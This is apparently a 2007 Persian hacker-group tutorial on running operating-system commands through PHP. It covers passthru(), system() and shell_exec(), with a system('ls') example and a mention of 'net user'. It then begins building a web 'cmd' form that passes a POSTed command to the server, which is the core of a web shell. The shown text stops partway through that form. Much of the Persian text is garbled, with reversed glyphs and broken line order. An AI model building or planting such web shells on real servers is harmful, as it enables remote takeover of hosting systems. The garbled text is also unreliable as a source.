ﮫﻋﻮﻤﺠﻣ
:
یدﺮﺑرﺎﮐ یﺎھ لﺎﺜﻣ
php
عﻮﺿﻮﻣ
:
execute your own commandz with php
ﺎﯾرآ ﯽﺘﯿﻨﻣا هوﺮﮔ
تلاﺎﻘﻣ یﺮﺳ
PHP
تلاﺎﻘﻣ یﺮﺳ رد
PHP
فﺪھ ﻦﯾا
ﻊﺑاﻮﺗ ﺎﺑ ار ﺎﻤﺷ ﺎﺗ ﻢﯾراد ار
PHP
ﻢﯾزﺎﺳ ﺎﻨﺷآ
.
درﻮﻣ رد ﻪﻟﺎﻘﻣ ﻦﯾا
Execute
تارﻮﺘﺳد ندﺮﮐ
زا هدﺎﻔﺘﺳا ﺎﺑ دﻮﺧ
PHP
ﺪﺷﺎﺑ ﯽﻣ
2007
Sc0rpion
Aria Security Team
8/18/2007
یدﺎﻋ ﺖﻟﺎﺣ رد ﺪﻧﺎﻤﮐ یاﺮﺟا یاﺮﺑ ﺖﭙﯾﺮﮑﺳا ﻦﯾا
)
Safe mod off
(
ﺎﻣ ﻊﺑاﻮﺗ ﮫﮐ ﯽﻃﺮﺷ ﮫﺑ ﺖﺴھ
disable
ﺪﻨﺷﺎﺑ هﺪﺸﻧ
.
بﻮﺧ
غاﺮﺳ ﺎﺠﻨﯾا رد ﺎﻣ
3
ﻤھ زا نﻮﺷدﺮﺑرﺎﮐ ﮫﮐ ﻢﯾﺮﯿﻣ ﻊﺑﺎﺗ
هﺮﺘﺸﯿﺑ ﮫ
!
دﻮﺼﻘﻣ ﮫﺑ ور ﺎﻣ ﮫﮐ ﺪﻨﺘﺴھ ﻢھ ﺮﮕﯾد ﻊﺑاﻮﺗ ﺖﺴھ رﺎﮐ لﻮﺻا ﻦﯾا ﮫﺘﺒﻟا
و ﺎھﺪﻨﻓﺮﺗ و ندﺮﮐ ﺲﭘ یﺎﺑ یاﺮﺑ ﮫﮕﯾد یﺎھ رﺎﮐ ﺎھار ﯽﻠﯿﺧ و ﻦﻧﻮﺳﺮﯿﻣ نﻮﻣدﻮﺧ
....
زا ﮫﮐ
google
ﺎﮭﻧوا یاﺮﺑ ﻊﺟﺮﻣ ﻦﯾﺮﺘﮭﺑ
ﮫﺷﺎﺑ ﮫﻧﻮﺘﯿﻣ
.
ﻢﯾﺪﯿﻨﺷ ور ﻂﻠﻏ رﺎﯿﺴﺑ ی ﮫﻠﻤﺟ ﺎﮭﺘﻗو ﯽﻠﯿﺧ
:
ﮫﺘﺴﺑ ور ﺪﻧﺎﻤﮐ روﺮﺳ
!
هراﺪﻧ ﯽﻋلاﻃا رﺎﺘﺧﺎﺳ زا دﺮﻓ ﮫﮐ دراد نآ زا ﺖﯾﺎﮑﺣ ﮫﻠﻤﺟ ﻦﯾا
ﺎﻓﺮﺻ
"
ﮫﺘﻓﺮﮔ دﺎﯾ یا ﮫﺸﯿﻠﮐ ور ﺐﻠﻄﻣ
.
بﻮﺧ
:
Passthru() : Execute an external program and display raw output
System() : Execute an external program and display the output
Shell_Exec() : Execute command via shell and return the complete output as a string
ﻊﺑﺎﺗ
system()
.
ﻊﺑﺎﺗ ﯽﻠﮐ ﻞﮑﺷ
:
string system ( string $command [, int &$return_var] )
هﺪﯿﻣ نﻮﺸﻧ ﻊﺑﺎﺗ ﮫﮐ ﺖﺴھ یراﺪﻘﻣ ﺶﯿﻣود ﺪﯾﺪﺑ ﺶﺑ ﺮﯿﻐﺘﻣ ﮏﯾ ﺎﺑ ﺪﯿﻧﻮﺘﯿﻣ ﺎﻤﺷ ور ﺶﯿﻟوا هراد ﺮﺘﻣارﺎﭘ ود بﻮﺧ
,
ا ﮫﮐ یﺪﻧﺎﻤﮐ ﺮﮔا
اﺮﺟ
ﺪﯿﻨﮑﯿﻣ
true
دﺪﻋ ﻢﻋ ﻊﺑﺎﺗ ﮫﻧودﺮﮔﺮﺑ ور
0
دﺪﻋ ﮫﻧﺮﮔو هﺪﯿﻣ نﻮﺸﻧ ور
1
ﺪﯿﻨﮐ ﮫﺟﻮﺗ هدﺎﺳ لﺎﺜﻣ ﮏﯾ ﮫﺑ نﺪﺷ ﻦﺷور یاﺮﺑ هﺪﯿﻣ نﻮﺸﻧ ور
:
<?php
echo '<pre>';
$last_line = system('ls’, $retval);
echo '
</pre>
<hr />Last line of the output: ' . $last_line . '
<hr />Return value: ' . $retval;
?>
ﮫﺸﺑ اﺮﺟا ﺲﮐﻮﻨﯿﻟ روﺮﺳ ﮏﯾ یور ﺮﺑ ﺖﭙﯾﺮﮑﺳا ﺮﮔا
$retval
راﺪﻘﻣ
0
یﺎﺠﺑ ﮫﮔا ﯽﻟو ﮫﻧودﺮﮕﯿﻣﺮﺑ ور
ls
زا لﺎﺜﻣ یاﺮﺑ
net user
راﺪﻘﻣ دراﺪﻧ دﻮﺟو ﺲﮐﻮﻨﯿﻟ رد یﺪﻧﺎﻤﮐ ﻦﯿﻨﭼ نﻮﭼ ﻢﯿﻨﮐ هدﺎﻔﺘﺳا
1
ﮫﻧودﺮﮕﯿﻣﺮﺑ ور
.
ﺪﻧﺎﻤﮐ ندﺮﮐ تﻮﯿﮐﺰﮔا ﮫﻤﮭﻣ ﺎﻣ یاﺮﺑ ﮫﮐ یﺰﯿﭼ ﮫﺘﺒﻟا
ﺴھ
ﻢﯾراﺪﻧ ﻊﻗاﻮﻣ ﺮﺘﺸﯿﺑ رد مود ﺮﺘﻣارﺎﭘ ﮫﺑ یزﺎﯿﻧ و ﺖ
!
ﮏﯾ ﺪﯿﻧﻮﺘﯿﻣ ﺎﻤﺷ ترﻮﺻ ﻦﯾﺪﺑ
cmd
ﺪﯿﺷﺎﺑ ﮫﺘﺷاد بو یور ﺮﺑ
:
<?php
echo"<br><left><form method='POST' action=''>".
"<input size='30' name='command'>".
"<input type='submit' value='eXecutE !'><br>".